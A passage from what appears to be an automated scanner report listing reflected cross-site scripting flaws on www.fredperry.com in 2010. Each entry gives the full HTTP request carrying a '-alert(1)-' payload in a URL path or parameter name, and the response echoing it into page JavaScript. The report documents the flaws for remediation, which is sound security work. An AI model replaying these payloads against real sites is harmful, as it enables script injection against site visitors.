<title> Men's B
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/bags/men/?9dc8a"-alert(1)-"a9caf531ee8=1");
//]]>
...[SNIP]...

1.25. http://www.fredperry.com/bags/women/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /bags/women/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f04a"-alert(1)-"172e220982f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bags6f04a"-alert(1)-"172e220982f/women/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:22:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=94un9ikch5osarj2upkkdtsjg7; expires=Tue, 09-Nov-2010 17:22:26 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/bags6f04a"-alert(1)-"172e220982f/women/");
//]]>
...[SNIP]...

1.26. http://www.fredperry.com/bags/women/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /bags/women/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fabc8"-alert(1)-"0f5859d0a8d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bags/womenfabc8"-alert(1)-"0f5859d0a8d/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:22:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=1vqfpruo2fkaf33lekrligvrs3; expires=Tue, 09-Nov-2010 17:22:42 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/bags/womenfabc8"-alert(1)-"0f5859d0a8d/");
//]]>
...[SNIP]...

1.27. http://www.fredperry.com/bags/women/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /bags/women/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 711a1"-alert(1)-"4fddbd7dfbd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bags/women/?711a1"-alert(1)-"4fddbd7dfbd=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:21:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=dflahktbppu5lbtqraphaglle2; expires=Tue, 09-Nov-2010 17:21:57 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30290

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/bags/women/?711a1"-alert(1)-"4fddbd7dfbd=1");
//]]>
...[SNIP]...

1.28. http://www.fredperry.com/catalogsearch/ajax/suggest/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /catalogsearch/ajax/suggest/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6533"-alert(1)-"855d4def8e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /catalogsearcha6533"-alert(1)-"855d4def8e2/ajax/suggest/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:34:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=msbkftrehe2499gnpdc6fhajb3; expires=Tue, 09-Nov-2010 17:34:38 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/catalogsearcha6533"-alert(1)-"855d4def8e2/ajax/suggest/");
//]]>
...[SNIP]...

1.29. http://www.fredperry.com/catalogsearch/ajax/suggest/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /catalogsearch/ajax/suggest/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5389"-alert(1)-"a8da9f27867 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /catalogsearch/ajaxa5389"-alert(1)-"a8da9f27867/suggest/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:36:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=7ht57d6h8og3t308gnu6l0nns3; expires=Tue, 09-Nov-2010 17:36:22 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/catalogsearch/ajaxa5389"-alert(1)-"a8da9f27867/suggest/");
//]]>
...[SNIP]...

1.30. http://www.fredperry.com/catalogsearch/ajax/suggest/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /catalogsearch/ajax/suggest/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a148d"-alert(1)-"ab7ff097b6d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /catalogsearch/ajax/suggesta148d"-alert(1)-"ab7ff097b6d/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:37:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=miih4kiqs00u95msd9dc70fdt3; expires=Tue, 09-Nov-2010 17:37:50 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/catalogsearch/ajax/suggesta148d"-alert(1)-"ab7ff097b6d/");
//]]>
...[SNIP]...

1.31. http://www.fredperry.com/catalogsearch/result/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /catalogsearch/result/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49ade"-alert(1)-"9853f03a934 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /catalogsearch49ade"-alert(1)-"9853f03a934/result/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:22:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=30se6b9v1g6p0lo6svqgj1vgs1; expires=Tue, 09-Nov-2010 17:22:14 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/catalogsearch49ade"-alert(1)-"9853f03a934/result/");
//]]>
...[SNIP]...

1.32. http://www.fredperry.com/catalogsearch/result/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /catalogsearch/result/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d24f"-alert(1)-"1aca295eca0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /catalogsearch/result1d24f"-alert(1)-"1aca295eca0/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:22:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=bp6840rulj7bcunchiglt11ee3; expires=Tue, 09-Nov-2010 17:22:35 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/catalogsearch/result1d24f"-alert(1)-"1aca295eca0/");
//]]>
...[SNIP]...

1.33. http://www.fredperry.com/checkout/cart/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /checkout/cart/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6fb5f"-alert(1)-"ef4f242604b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout6fb5f"-alert(1)-"ef4f242604b/cart/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:18:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=vi3g5moh1rl2cjoh82ejcl9rl5; expires=Tue, 09-Nov-2010 17:18:32 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/checkout6fb5f"-alert(1)-"ef4f242604b/cart/");
//]]>
...[SNIP]...

1.34. http://www.fredperry.com/checkout/cart/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /checkout/cart/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3f96"-alert(1)-"360bb29e453 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout/carte3f96"-alert(1)-"360bb29e453/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:18:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=28opuu1bvek2saq3nnrtc74pk1; expires=Tue, 09-Nov-2010 17:18:50 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/checkout/carte3f96"-alert(1)-"360bb29e453/");
//]]>
...[SNIP]...

1.35. http://www.fredperry.com/checkout/cart/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /checkout/cart/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aaeb2"-alert(1)-"48ab0bad009 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout/cart/?aaeb2"-alert(1)-"48ab0bad009=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:17:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=5nisihs029stoa57940hda3sn4; expires=Tue, 09-Nov-2010 17:17:52 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Fred Per
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/checkout/cart/?aaeb2"-alert(1)-"48ab0bad009=1");
//]]>
...[SNIP]...

1.36. http://www.fredperry.com/contacts/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /contacts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd4e5"-alert(1)-"2ac73757ecd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /contactsbd4e5"-alert(1)-"2ac73757ecd/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:18:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=jh0vo27j1jvpb68t8sdl5qirv6; expires=Tue, 09-Nov-2010 17:18:10 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/contactsbd4e5"-alert(1)-"2ac73757ecd/");
//]]>
...[SNIP]...

1.37. http://www.fredperry.com/contacts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /contacts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 464b0"-alert(1)-"4c1edb0da7a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /contacts/?464b0"-alert(1)-"4c1edb0da7a=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:17:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ne26v2iejs3kmhqd2l93g608e1; expires=Tue, 09-Nov-2010 17:17:38 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Fred Per
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/contacts/?464b0"-alert(1)-"4c1edb0da7a=1");
//]]>
...[SNIP]...

1.38. http://www.fredperry.com/customercare/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41986"-alert(1)-"bad21956557 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare41986"-alert(1)-"bad21956557/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
